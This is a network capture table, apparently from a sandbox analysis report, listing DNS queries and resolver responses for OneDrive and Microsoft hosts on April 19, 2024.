                                                                                                                                                  Apr 19, 2024 16:16:48.310214043 CEST192.168.2.228.8.8.80x9edeStandard query (0)public.am.files.1drv.comA (IP address)IN (0x0001)false
                                                                                                                                                  Apr 19, 2024 16:16:48.611421108 CEST192.168.2.228.8.8.80xf7c2Standard query (0)public.am.files.1drv.comA (IP address)IN (0x0001)false
                                                                                                                                                  Apr 19, 2024 16:16:48.728960991 CEST192.168.2.228.8.8.80xf7c2Standard query (0)public.am.files.1drv.comA (IP address)IN (0x0001)false
                                                                                                                                                  Apr 19, 2024 16:16:48.834635973 CEST192.168.2.228.8.8.80xf7c2Standard query (0)public.am.files.1drv.comA (IP address)IN (0x0001)false
                                                                                                                                                  Apr 19, 2024 16:17:00.385827065 CEST192.168.2.228.8.8.80xa0c2Standard query (0)63.155.11.0.in-addr.arpaPTR (Pointer record)IN (0x0001)false
                                                                                                                                                  Apr 19, 2024 16:17:00.492476940 CEST192.168.2.228.8.8.80xa0c2Standard query (0)63.155.11.0.in-addr.arpaPTR (Pointer record)IN (0x0001)false
                                                                                                                                                  Apr 19, 2024 16:17:06.044245958 CEST192.168.2.228.8.8.80x67c2Standard query (0)onedrive.live.comA (IP address)IN (0x0001)false
                                                                                                                                                  Apr 19, 2024 16:17:06.669373035 CEST192.168.2.228.8.8.80x959bStandard query (0)onedrive.live.comA (IP address)IN (0x0001)false
                                                                                                                                                  Apr 19, 2024 16:17:08.817966938 CEST192.168.2.228.8.8.80xc94cStandard query (0)public.am.files.1drv.comA (IP address)IN (0x0001)false
                                                                                                                                                  Apr 19, 2024 16:17:08.923708916 CEST192.168.2.228.8.8.80xc94cStandard query (0)public.am.files.1drv.comA (IP address)IN (0x0001)false
                                                                                                                                                  Apr 19, 2024 16:17:09.442950964 CEST192.168.2.228.8.8.80xd292Standard query (0)public.am.files.1drv.comA (IP address)IN (0x0001)false
                                                                                                                                                  Apr 19, 2024 16:17:09.616914988 CEST192.168.2.228.8.8.80xd292Standard query (0)public.am.files.1drv.comA (IP address)IN (0x0001)false
                                                                                                                                                  Apr 19, 2024 16:17:10.036734104 CEST192.168.2.228.8.8.80xd292Standard query (0)public.am.files.1drv.comA (IP address)IN (0x0001)false
                                                                                                                                                  Apr 19, 2024 16:17:10.276607990 CEST192.168.2.228.8.8.80xd292Standard query (0)public.am.files.1drv.comA (IP address)IN (0x0001)false
                                                                                                                                                  Apr 19, 2024 16:17:10.384351015 CEST192.168.2.228.8.8.80xd292Standard query (0)public.am.files.1drv.comA (IP address)IN (0x0001)false
                                                                                                                                                  Apr 19, 2024 16:17:15.113112926 CEST192.168.2.228.8.8.80x21d2Standard query (0)onedrive.live.comA (IP address)IN (0x0001)false
                                                                                                                                                  Apr 19, 2024 16:17:15.442236900 CEST192.168.2.228.8.8.80xf7f6Standard query (0)onedrive.live.comA (IP address)IN (0x0001)false
                                                                                                                                                  Apr 19, 2024 16:17:16.700238943 CEST192.168.2.228.8.8.80x4f6cStandard query (0)onedrive.live.comA (IP address)IN (0x0001)false
                                                                                                                                                  Apr 19, 2024 16:17:16.785896063 CEST192.168.2.228.8.8.80x962aStandard query (0)public.am.files.1drv.comA (IP address)IN (0x0001)false
                                                                                                                                                  Apr 19, 2024 16:17:16.811804056 CEST192.168.2.228.8.8.80x9becStandard query (0)onedrive.live.comA (IP address)IN (0x0001)false
                                                                                                                                                  Apr 19, 2024 16:17:16.957478046 CEST192.168.2.228.8.8.80xfafaStandard query (0)public.am.files.1drv.comA (IP address)IN (0x0001)false
                                                                                                                                                  Apr 19, 2024 16:17:18.315023899 CEST192.168.2.228.8.8.80x87edStandard query (0)utqurw.am.files.1drv.comA (IP address)IN (0x0001)false
                                                                                                                                                  Apr 19, 2024 16:17:18.436022997 CEST192.168.2.228.8.8.80x87edStandard query (0)utqurw.am.files.1drv.comA (IP address)IN (0x0001)false
                                                                                                                                                  Apr 19, 2024 16:17:18.559931040 CEST192.168.2.228.8.8.80x87edStandard query (0)utqurw.am.files.1drv.comA (IP address)IN (0x0001)false
                                                                                                                                                  Apr 19, 2024 16:17:18.670434952 CEST192.168.2.228.8.8.80x87edStandard query (0)utqurw.am.files.1drv.comA (IP address)IN (0x0001)false
                                                                                                                                                  Apr 19, 2024 16:17:18.785351992 CEST192.168.2.228.8.8.80xd3e4Standard query (0)utqurw.am.files.1drv.comA (IP address)IN (0x0001)false
                                                                                                                                                  Apr 19, 2024 16:17:18.906725883 CEST192.168.2.228.8.8.80xd3e4Standard query (0)utqurw.am.files.1drv.comA (IP address)IN (0x0001)false
                                                                                                                                                  Apr 19, 2024 16:17:19.029267073 CEST192.168.2.228.8.8.80xd3e4Standard query (0)utqurw.am.files.1drv.comA (IP address)IN (0x0001)false
                                                                                                                                                  Apr 19, 2024 16:17:20.440167904 CEST192.168.2.228.8.8.80xa82dStandard query (0)skydrive.live.comA (IP address)IN (0x0001)false
                                                                                                                                                  Apr 19, 2024 16:17:20.561587095 CEST192.168.2.228.8.8.80xa82dStandard query (0)skydrive.live.comA (IP address)IN (0x0001)false
                                                                                                                                                  Apr 19, 2024 16:17:20.755750895 CEST192.168.2.228.8.8.80xa82dStandard query (0)skydrive.live.comA (IP address)IN (0x0001)false
                                                                                                                                                  Apr 19, 2024 16:17:20.945257902 CEST192.168.2.228.8.8.80xa82dStandard query (0)skydrive.live.comA (IP address)IN (0x0001)false
                                                                                                                                                  Apr 19, 2024 16:17:21.164099932 CEST192.168.2.228.8.8.80xa82dStandard query (0)skydrive.live.comA (IP address)IN (0x0001)false
                                                                                                                                                  Apr 19, 2024 16:17:29.107588053 CEST192.168.2.228.8.8.80x1848Standard query (0)63.155.11.0.in-addr.arpaPTR (Pointer record)IN (0x0001)false
                                                                                                                                                  Apr 19, 2024 16:17:29.213006020 CEST192.168.2.228.8.8.80x1848Standard query (0)63.155.11.0.in-addr.arpaPTR (Pointer record)IN (0x0001)false
                                                                                                                                                  Apr 19, 2024 16:17:29.317933083 CEST192.168.2.228.8.8.80x1848Standard query (0)63.155.11.0.in-addr.arpaPTR (Pointer record)IN (0x0001)false
                                                                                                                                                  Apr 19, 2024 16:17:29.423310041 CEST192.168.2.228.8.8.80x1848Standard query (0)63.155.11.0.in-addr.arpaPTR (Pointer record)IN (0x0001)false
                                                                                                                                                  Apr 19, 2024 16:17:46.623644114 CEST192.168.2.228.8.8.80xb268Standard query (0)onedrive.live.comA (IP address)IN (0x0001)false
                                                                                                                                                  Apr 19, 2024 16:17:46.794909000 CEST192.168.2.228.8.8.80xb708Standard query (0)onedrive.live.comA (IP address)IN (0x0001)false
                                                                                                                                                  Apr 19, 2024 16:17:48.363692999 CEST192.168.2.228.8.8.80x1981Standard query (0)utqurw.am.files.1drv.comA (IP address)IN (0x0001)false
                                                                                                                                                  Apr 19, 2024 16:17:48.500835896 CEST192.168.2.228.8.8.80x1981Standard query (0)utqurw.am.files.1drv.comA (IP address)IN (0x0001)false
                                                                                                                                                  Apr 19, 2024 16:17:48.622031927 CEST192.168.2.228.8.8.80x1981Standard query (0)utqurw.am.files.1drv.comA (IP address)IN (0x0001)false
                                                                                                                                                  Apr 19, 2024 16:17:48.728241920 CEST192.168.2.228.8.8.80x1981Standard query (0)utqurw.am.files.1drv.comA (IP address)IN (0x0001)false
                                                                                                                                                  Apr 19, 2024 16:17:48.833736897 CEST192.168.2.228.8.8.80x1981Standard query (0)utqurw.am.files.1drv.comA (IP address)IN (0x0001)false
                                                                                                                                                  TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                                                                                                  Apr 19, 2024 16:16:43.319372892 CEST8.8.8.8192.168.2.220xac83No error (0)onedrive.live.comweb.fe.1drv.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                  Apr 19, 2024 16:16:43.319372892 CEST8.8.8.8192.168.2.220xac83No error (0)web.fe.1drv.comodc-web-geo.onedrive.akadns.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                  Apr 19, 2024 16:16:43.319372892 CEST8.8.8.8192.168.2.220xac83No error (0)odwebpl.trafficmanager.net.dual-spov-0006.spov-msedge.netdual-spov-0006.spov-msedge.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                  Apr 19, 2024 16:16:43.319372892 CEST8.8.8.8192.168.2.220xac83No error (0)dual-spov-0006.spov-msedge.net13.107.137.11A (IP address)IN (0x0001)false
                                                                                                                                                  Apr 19, 2024 16:16:43.319372892 CEST8.8.8.8192.168.2.220xac83No error (0)dual-spov-0006.spov-msedge.net13.107.139.11A (IP address)IN (0x0001)false
                                                                                                                                                  Apr 19, 2024 16:16:43.504853010 CEST8.8.8.8192.168.2.220xeefaNo error (0)onedrive.live.comweb.fe.1drv.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                  Apr 19, 2024 16:16:43.504853010 CEST8.8.8.8192.168.2.220xeefaNo error (0)web.fe.1drv.comodc-web-geo.onedrive.akadns.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                  Apr 19, 2024 16:16:43.504853010 CEST8.8.8.8192.168.2.220xeefaNo error (0)odwebpl.trafficmanager.net.dual-spov-0006.spov-msedge.netdual-spov-0006.spov-dc-msedge.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                  Apr 19, 2024 16:16:43.504853010 CEST8.8.8.8192.168.2.220xeefaNo error (0)dual-spov-0006.spov-dc-msedge.net150.171.41.11A (IP address)IN (0x0001)false
                                                                                                                                                  Apr 19, 2024 16:16:43.504853010 CEST8.8.8.8192.168.2.220xeefaNo error (0)dual-spov-0006.spov-dc-msedge.net150.171.43.11A (IP address)IN (0x0001)false
                                                                                                                                                  Apr 19, 2024 16:16:45.153152943 CEST8.8.8.8192.168.2.220x7abdNo error (0)public.am.files.1drv.comam-files.fe.1drv.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                  Apr 19, 2024 16:16:45.153152943 CEST8.8.8.8192.168.2.220x7abdNo error (0)am-files.fe.1drv.comodc-am-files-geo.onedrive.akadns.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                  Apr 19, 2024 16:16:45.259771109 CEST8.8.8.8192.168.2.220x7abdNo error (0)public.am.files.1drv.comam-files.fe.1drv.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                  Apr 19, 2024 16:16:45.259771109 CEST8.8.8.8192.168.2.220x7abdNo error (0)am-files.fe.1drv.comodc-am-files-geo.onedrive.akadns.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                  Apr 19, 2024 16:16:45.368146896 CEST8.8.8.8192.168.2.220x7abdNo error (0)public.am.files.1drv.comam-files.fe.1drv.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                  Apr 19, 2024 16:16:45.368146896 CEST8.8.8.8192.168.2.220x7abdNo error (0)am-files.fe.1drv.comodc-am-files-geo.onedrive.akadns.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                  Apr 19, 2024 16:16:45.530430079 CEST8.8.8.8192.168.2.220x7abdNo error (0)public.am.files.1drv.comam-files.fe.1drv.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                  Apr 19, 2024 16:16:45.530430079 CEST8.8.8.8192.168.2.220x7abdNo error (0)am-files.fe.1drv.comodc-am-files-geo.onedrive.akadns.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                  Apr 19, 2024 16:16:45.635808945 CEST8.8.8.8192.168.2.220x7abdNo error (0)public.am.files.1drv.comam-files.fe.1drv.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                  Apr 19, 2024 16:16:45.635808945 CEST8.8.8.8192.168.2.220x7abdNo error (0)am-files.fe.1drv.comodc-am-files-geo.onedrive.akadns.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                  Apr 19, 2024 16:16:45.969971895 CEST8.8.8.8192.168.2.220xfe0fNo error (0)onedrive.live.comweb.fe.1drv.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                  Apr 19, 2024 16:16:45.969971895 CEST8.8.8.8192.168.2.220xfe0fNo error (0)web.fe.1drv.comodc-web-geo.onedrive.akadns.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                  Apr 19, 2024 16:16:45.969971895 CEST8.8.8.8192.168.2.220xfe0fNo error (0)odwebpl.trafficmanager.net.dual-spov-0006.spov-msedge.netdual-spov-0006.spov-msedge.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                  Apr 19, 2024 16:16:45.969971895 CEST8.8.8.8192.168.2.220xfe0fNo error (0)dual-spov-0006.spov-msedge.net13.107.137.11A (IP address)IN (0x0001)false
                                                                                                                                                  Apr 19, 2024 16:16:45.969971895 CEST8.8.8.8192.168.2.220xfe0fNo error (0)dual-spov-0006.spov-msedge.net13.107.139.11A (IP address)IN (0x0001)false
                                                                                                                                                  Apr 19, 2024 16:16:46.075197935 CEST8.8.8.8192.168.2.220xfe0fNo error (0)onedrive.live.comweb.fe.1drv.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                  Apr 19, 2024 16:16:46.075197935 CEST8.8.8.8192.168.2.220xfe0fNo error (0)web.fe.1drv.comodc-web-geo.onedrive.akadns.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                  Apr 19, 2024 16:16:46.075197935 CEST8.8.8.8192.168.2.220xfe0fNo error (0)odwebpl.trafficmanager.net.dual-spov-0006.spov-msedge.netdual-spov-0006.spov-msedge.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                  Apr 19, 2024 16:16:46.075197935 CEST8.8.8.8192.168.2.220xfe0fNo error (0)dual-spov-0006.spov-msedge.net13.107.137.11A (IP address)IN (0x0001)false
                                                                                                                                                  Apr 19, 2024 16:16:46.075197935 CEST8.8.8.8192.168.2.220xfe0fNo error (0)dual-spov-0006.spov-msedge.net13.107.139.11A (IP address)IN (0x0001)false
                                                                                                                                                  Apr 19, 2024 16:16:46.186805010 CEST8.8.8.8192.168.2.220xbea2No error (0)onedrive.live.comweb.fe.1drv.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                  Apr 19, 2024 16:16:46.186805010 CEST8.8.8.8192.168.2.220xbea2No error (0)web.fe.1drv.comodc-web-geo.onedrive.akadns.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                  Apr 19, 2024 16:16:46.186805010 CEST8.8.8.8192.168.2.220xbea2No error (0)odwebpl.trafficmanager.net.dual-spov-0006.spov-msedge.netdual-spov-0006.spov-msedge.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                  Apr 19, 2024 16:16:46.186805010 CEST8.8.8.8192.168.2.220xbea2No error (0)dual-spov-0006.spov-msedge.net13.107.137.11A (IP address)IN (0x0001)false
                                                                                                                                                  Apr 19, 2024 16:16:46.186805010 CEST8.8.8.8192.168.2.220xbea2No error (0)dual-spov-0006.spov-msedge.net13.107.139.11A (IP address)IN (0x0001)false
                                                                                                                                                  Apr 19, 2024 16:16:46.291877985 CEST8.8.8.8192.168.2.220xbea2No error (0)onedrive.live.comweb.fe.1drv.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                  Apr 19, 2024 16:16:46.291877985 CEST8.8.8.8192.168.2.220xbea2No error (0)web.fe.1drv.comodc-web-geo.onedrive.akadns.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                  Apr 19, 2024 16:16:46.291877985 CEST8.8.8.8192.168.2.220xbea2No error (0)odwebpl.trafficmanager.net.dual-spov-0006.spov-msedge.netdual-spov-0006.spov-msedge.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                  Apr 19, 2024 16:16:46.291877985 CEST8.8.8.8192.168.2.220xbea2No error (0)dual-spov-0006.spov-msedge.net13.107.137.11A (IP address)IN (0x0001)false
                                                                                                                                                  Apr 19, 2024 16:16:46.291877985 CEST8.8.8.8192.168.2.220xbea2No error (0)dual-spov-0006.spov-msedge.net13.107.139.11A (IP address)IN (0x0001)false
                                                                                                                                                  Apr 19, 2024 16:16:46.523964882 CEST8.8.8.8192.168.2.220xbea2No error (0)onedrive.live.comweb.fe.1drv.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                  Apr 19, 2024 16:16:46.523964882 CEST8.8.8.8192.168.2.220xbea2No error (0)web.fe.1drv.comodc-web-geo.onedrive.akadns.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                  Apr 19, 2024 16:16:46.523964882 CEST8.8.8.8192.168.2.220xbea2No error (0)odwebpl.trafficmanager.net.dual-spov-0006.spov-msedge.netdual-spov-0006.spov-dc-msedge.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                  Apr 19, 2024 16:16:46.523964882 CEST8.8.8.8192.168.2.220xbea2No error (0)dual-spov-0006.spov-dc-msedge.net150.171.41.11A (IP address)IN (0x0001)false
                                                                                                                                                  Apr 19, 2024 16:16:46.523964882 CEST8.8.8.8192.168.2.220xbea2No error (0)dual-spov-0006.spov-dc-msedge.net150.171.43.11A (IP address)IN (0x0001)false
                                                                                                                                                  Apr 19, 2024 16:16:46.629395962 CEST8.8.8.8192.168.2.220xbea2No error (0)onedrive.live.comweb.fe.1drv.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                  Apr 19, 2024 16:16:46.629395962 CEST8.8.8.8192.168.2.220xbea2No error (0)web.fe.1drv.comodc-web-geo.onedrive.akadns.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                  Apr 19, 2024 16:16:46.629395962 CEST8.8.8.8192.168.2.220xbea2No error (0)odwebpl.trafficmanager.net.dual-spov-0006.spov-msedge.netdual-spov-0006.spov-dc-msedge.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                  Apr 19, 2024 16:16:46.629395962 CEST8.8.8.8192.168.2.220xbea2No error (0)dual-spov-0006.spov-dc-msedge.net150.171.41.11A (IP address)IN (0x0001)false
                                                                                                                                                  Apr 19, 2024 16:16:46.629395962 CEST8.8.8.8192.168.2.220xbea2No error (0)dual-spov-0006.spov-dc-msedge.net150.171.43.11A (IP address)IN (0x0001)false
                                                                                                                                                  Apr 19, 2024 16:16:46.734975100 CEST8.8.8.8192.168.2.220xbea2No error (0)onedrive.live.comweb.fe.1drv.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                  Apr 19, 2024 16:16:46.734975100 CEST8.8.8.8192.168.2.220xbea2No error (0)web.fe.1drv.comodc-web-geo.onedrive.akadns.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                  Apr 19, 2024 16:16:46.734975100 CEST8.8.8.8192.168.2.220xbea2No error (0)odwebpl.trafficmanager.net.dual-spov-0006.spov-msedge.netdual-spov-0006.spov-dc-msedge.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                  Apr 19, 2024 16:16:46.734975100 CEST8.8.8.8192.168.2.220xbea2No error (0)dual-spov-0006.spov-dc-msedge.net150.171.41.11A (IP address)IN (0x0001)false
                                                                                                                                                  Apr 19, 2024 16:16:46.734975100 CEST8.8.8.8192.168.2.220xbea2No error (0)dual-spov-0006.spov-dc-msedge.net150.171.43.11A (IP address)IN (0x0001)false
                                                                                                                                                  Apr 19, 2024 16:16:48.046415091 CEST8.8.8.8192.168.2.220x9edeNo error (0)public.am.files.1drv.comam-files.fe.1drv.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                  Apr 19, 2024 16:16:48.046415091 CEST8.8.8.8192.168.2.220x9edeNo error (0)am-files.fe.1drv.comodc-am-files-geo.onedrive.akadns.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                  Apr 19, 2024 16:16:48.151813030 CEST8.8.8.8192.168.2.220x9edeNo error (0)public.am.files.1drv.comam-files.fe.1drv.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                  Apr 19, 2024 16:16:48.151813030 CEST8.8.8.8192.168.2.220x9edeNo error (0)am-files.fe.1drv.comodc-am-files-geo.onedrive.akadns.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                  Apr 19, 2024 16:16:48.309794903 CEST8.8.8.8192.168.2.220x9edeNo error (0)public.am.files.1drv.comam-files.fe.1drv.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                  Apr 19, 2024 16:16:48.309794903 CEST8.8.8.8192.168.2.220x9edeNo error (0)am-files.fe.1drv.comodc-am-files-geo.onedrive.akadns.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                  Apr 19, 2024 16:16:48.415648937 CEST8.8.8.8192.168.2.220x9edeNo error (0)public.am.files.1drv.comam-files.fe.1drv.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                  Apr 19, 2024 16:16:48.415648937 CEST8.8.8.8192.168.2.220x9edeNo error (0)am-files.fe.1drv.comodc-am-files-geo.onedrive.akadns.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                  Apr 19, 2024 16:16:48.716620922 CEST8.8.8.8192.168.2.220xf7c2No error (0)public.am.files.1drv.comam-files.fe.1drv.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                  Apr 19, 2024 16:16:48.716620922 CEST8.8.8.8192.168.2.220xf7c2No error (0)am-files.fe.1drv.comodc-am-files-geo.onedrive.akadns.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                  Apr 19, 2024 16:16:48.834243059 CEST8.8.8.8192.168.2.220xf7c2No error (0)public.am.files.1drv.comam-files.fe.1drv.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                  Apr 19, 2024 16:16:48.834243059 CEST8.8.8.8192.168.2.220xf7c2No error (0)am-files.fe.1drv.comodc-am-files-geo.onedrive.akadns.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                  Apr 19, 2024 16:16:48.939842939 CEST8.8.8.8192.168.2.220xf7c2No error (0)public.am.files.1drv.comam-files.fe.1drv.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                  Apr 19, 2024 16:16:48.939842939 CEST8.8.8.8192.168.2.220xf7c2No error (0)am-files.fe.1drv.comodc-am-files-geo.onedrive.akadns.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                  Apr 19, 2024 16:17:00.492229939 CEST8.8.8.8192.168.2.220xa0c2Name error (3)63.155.11.0.in-addr.arpanonenonePTR (Pointer record)IN (0x0001)false
                                                                                                                                                  Apr 19, 2024 16:17:00.597832918 CEST8.8.8.8192.168.2.220xa0c2Name error (3)63.155.11.0.in-addr.arpanonenonePTR (Pointer record)IN (0x0001)false
                                                                                                                                                  Apr 19, 2024 16:17:06.218147993 CEST8.8.8.8192.168.2.220x67c2No error (0)onedrive.live.comweb.fe.1drv.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                  Apr 19, 2024 16:17:06.218147993 CEST8.8.8.8192.168.2.220x67c2No error (0)web.fe.1drv.comodc-web-geo.onedrive.akadns.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                  Apr 19, 2024 16:17:06.218147993 CEST8.8.8.8192.168.2.220x67c2No error (0)odwebpl.trafficmanager.net.dual-spov-0006.spov-msedge.netdual-spov-0006.spov-msedge.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                  Apr 19, 2024 16:17:06.218147993 CEST8.8.8.8192.168.2.220x67c2No error (0)dual-spov-0006.spov-msedge.net13.107.137.11A (IP address)IN (0x0001)false
                                                                                                                                                  Apr 19, 2024 16:17:06.218147993 CEST8.8.8.8192.168.2.220x67c2No error (0)dual-spov-0006.spov-msedge.net13.107.139.11A (IP address)IN (0x0001)false
                                                                                                                                                  Apr 19, 2024 16:17:06.774657965 CEST8.8.8.8192.168.2.220x959bNo error (0)onedrive.live.comweb.fe.1drv.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                  Apr 19, 2024 16:17:06.774657965 CEST8.8.8.8192.168.2.220x959bNo error (0)web.fe.1drv.comodc-web-geo.onedrive.akadns.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                  Apr 19, 2024 16:17:06.774657965 CEST8.8.8.8192.168.2.220x959bNo error (0)odwebpl.trafficmanager.net.dual-spov-0006.spov-msedge.netdual-spov-0006.spov-msedge.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                  Apr 19, 2024 16:17:06.774657965 CEST8.8.8.8192.168.2.220x959bNo error (0)dual-spov-0006.spov-msedge.net13.107.137.11A (IP address)IN (0x0001)false
                                                                                                                                                  Apr 19, 2024 16:17:06.774657965 CEST8.8.8.8192.168.2.220x959bNo error (0)dual-spov-0006.spov-msedge.net13.107.139.11A (IP address)IN (0x0001)false
                                                                                                                                                  Apr 19, 2024 16:17:08.923115015 CEST8.8.8.8192.168.2.220xc94cNo error (0)public.am.files.1drv.comam-files.fe.1drv.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                  Apr 19, 2024 16:17:08.923115015 CEST8.8.8.8192.168.2.220xc94cNo error (0)am-files.fe.1drv.comodc-am-files-geo.onedrive.akadns.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                  Apr 19, 2024 16:17:09.028888941 CEST8.8.8.8192.168.2.220xc94cNo error (0)public.am.files.1drv.comam-files.fe.1drv.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                  Apr 19, 2024 16:17:09.028888941 CEST8.8.8.8192.168.2.220xc94cNo error (0)am-files.fe.1drv.comodc-am-files-geo.onedrive.akadns.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                  Apr 19, 2024 16:17:09.616692066 CEST8.8.8.8192.168.2.220xd292No error (0)public.am.files.1drv.comam-files.fe.1drv.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                  Apr 19, 2024 16:17:09.616692066 CEST8.8.8.8192.168.2.220xd292No error (0)am-files.fe.1drv.comodc-am-files-geo.onedrive.akadns.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                  Apr 19, 2024 16:17:09.722064972 CEST8.8.8.8192.168.2.220xd292No error (0)public.am.files.1drv.comam-files.fe.1drv.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                  Apr 19, 2024 16:17:09.722064972 CEST8.8.8.8192.168.2.220xd292No error (0)am-files.fe.1drv.comodc-am-files-geo.onedrive.akadns.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                  Apr 19, 2024 16:17:10.227175951 CEST8.8.8.8192.168.2.220xd292No error (0)public.am.files.1drv.comam-files.fe.1drv.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                  Apr 19, 2024 16:17:10.227175951 CEST8.8.8.8192.168.2.220xd292No error (0)am-files.fe.1drv.comodc-am-files-geo.onedrive.akadns.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                  Apr 19, 2024 16:17:10.383984089 CEST8.8.8.8192.168.2.220xd292No error (0)public.am.files.1drv.comam-files.fe.1drv.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                  Apr 19, 2024 16:17:10.383984089 CEST8.8.8.8192.168.2.220xd292No error (0)am-files.fe.1drv.comodc-am-files-geo.onedrive.akadns.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                  Apr 19, 2024 16:17:10.489423990 CEST8.8.8.8192.168.2.220xd292No error (0)public.am.files.1drv.comam-files.fe.1drv.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                  Apr 19, 2024 16:17:10.489423990 CEST8.8.8.8192.168.2.220xd292No error (0)am-files.fe.1drv.comodc-am-files-geo.onedrive.akadns.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                  Apr 19, 2024 16:17:15.221918106 CEST8.8.8.8192.168.2.220x21d2No error (0)onedrive.live.comweb.fe.1drv.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                  Apr 19, 2024 16:17:15.221918106 CEST8.8.8.8192.168.2.220x21d2No error (0)web.fe.1drv.comodc-web-geo.onedrive.akadns.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                  Apr 19, 2024 16:17:15.221918106 CEST8.8.8.8192.168.2.220x21d2No error (0)odwebpl.trafficmanager.net.dual-spov-0006.spov-msedge.netdual-spov-0006.spov-msedge.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                  Apr 19, 2024 16:17:15.221918106 CEST8.8.8.8192.168.2.220x21d2No error (0)dual-spov-0006.spov-msedge.net13.107.137.11A (IP address)IN (0x0001)false
                                                                                                                                                  Apr 19, 2024 16:17:15.221918106 CEST8.8.8.8192.168.2.220x21d2No error (0)dual-spov-0006.spov-msedge.net13.107.139.11A (IP address)IN (0x0001)false
                                                                                                                                                  Apr 19, 2024 16:17:15.673007965 CEST8.8.8.8192.168.2.220xf7f6No error (0)onedrive.live.comweb.fe.1drv.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                  Apr 19, 2024 16:17:15.673007965 CEST8.8.8.8192.168.2.220xf7f6No error (0)web.fe.1drv.comodc-web-geo.onedrive.akadns.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                  Apr 19, 2024 16:17:15.673007965 CEST8.8.8.8192.168.2.220xf7f6No error (0)odwebpl.trafficmanager.net.dual-spov-0006.spov-msedge.netdual-spov-0006.spov-dc-msedge.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                  Apr 19, 2024 16:17:15.673007965 CEST8.8.8.8192.168.2.220xf7f6No error (0)dual-spov-0006.spov-dc-msedge.net150.171.41.11A (IP address)IN (0x0001)false
                                                                                                                                                  Apr 19, 2024 16:17:15.673007965 CEST8.8.8.8192.168.2.220xf7f6No error (0)dual-spov-0006.spov-dc-msedge.net150.171.43.11A (IP address)IN (0x0001)false
                                                                                                                                                  Apr 19, 2024 16:17:16.805298090 CEST8.8.8.8192.168.2.220x4f6cNo error (0)onedrive.live.comweb.fe.1drv.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                  Apr 19, 2024 16:17:16.805298090 CEST8.8.8.8192.168.2.220x4f6cNo error (0)web.fe.1drv.comodc-web-geo.onedrive.akadns.netCNAME (Canonical name)IN (0x0001)false
